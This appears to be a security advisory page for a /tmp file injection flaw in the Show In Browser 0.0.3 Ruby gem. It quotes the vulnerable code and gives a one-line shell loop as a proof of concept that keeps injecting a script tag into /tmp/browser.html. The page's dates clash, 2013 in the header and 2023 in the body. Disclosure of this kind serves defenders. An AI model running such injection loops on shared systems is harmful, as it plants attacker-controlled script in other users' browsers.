Show In Browser 0.0.3 Ruby Gem /tmp file injection vulnerability

2013.05.18
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-59


Ogólna skala CVSS: 3.3/10
Znaczenie: 4.9/10
Łatwość wykorzystania: 3.4/10
Wymagany dostęp: Lokalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

TITLE: &#65279;Show In Browser 0.0.3 Ruby Gem /tmp file injection vulnerability&#65279; DATE: 5/15/2023 AUTHOR: Larry W. Cashdollar (@_larry0) DOWNLOAD: https://rubygems.org/gems/show_in_browser DESCRIPTION: Opens arbitrary text in your browser VENDOR: Jonathan Leung FIX: N/A CVE: TBD DETAILS: The following code uses the temporary file "/tmp/browser.html" insecurely. 2 FILE_LOCATION = "/tmp/browser.html" 3 4 class << self 5 6 def show(html) 7 file = File.open(FILE_LOCATION, 'w') 8 file.write(html) 9 file.close 10 11 `open #{FILE_LOCATION}` By a malicious user creating /tmp/browser.html first and repeatedly writing to it they can inject malicious html into the file right before it is about to be opened. PoC: nobody () pitter:/$ while (true); do echo "<script> alert('Hello'); </script>" >> /tmp/browser.html; done Will pop up a java script alert in other gem users browser.

Referencje:

http://seclists.org/oss-sec/2013/q2/354


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top